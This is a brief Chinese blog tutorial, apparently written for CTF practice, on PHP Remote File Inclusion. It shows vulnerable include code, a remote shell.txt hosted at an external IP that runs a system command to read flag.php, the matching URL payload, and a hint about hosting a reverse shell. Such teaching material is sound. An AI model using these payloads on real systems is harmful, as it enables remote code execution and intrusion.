远程文件包含(RFI)
漏洞原因
当一段代码看起来像下面这样,且没有做任何过滤时,RFI 就诞生了
<?php
// 从 URL 获取文件名,例如 ?path=home.php
$file = $_GET['path'];
// 直接引入并执行该文件
include($file);
?>
一、在服务器上面放置恶意文件
http://120.26.240.12/shell.txt,内容如下:
<?php system('cat /var/www/html/flag.php'); ?>
二、payload如下:
?path=http://120.26.240.12/shell.txt
注:可以直接放那个反弹shell的php脚本,可以接收shell

本文来自博客园,作者:Doll_Marker,转载请注明原文链接:https://www.cnblogs.com/dollaikun/p/20627528

浙公网安备 33010602011771号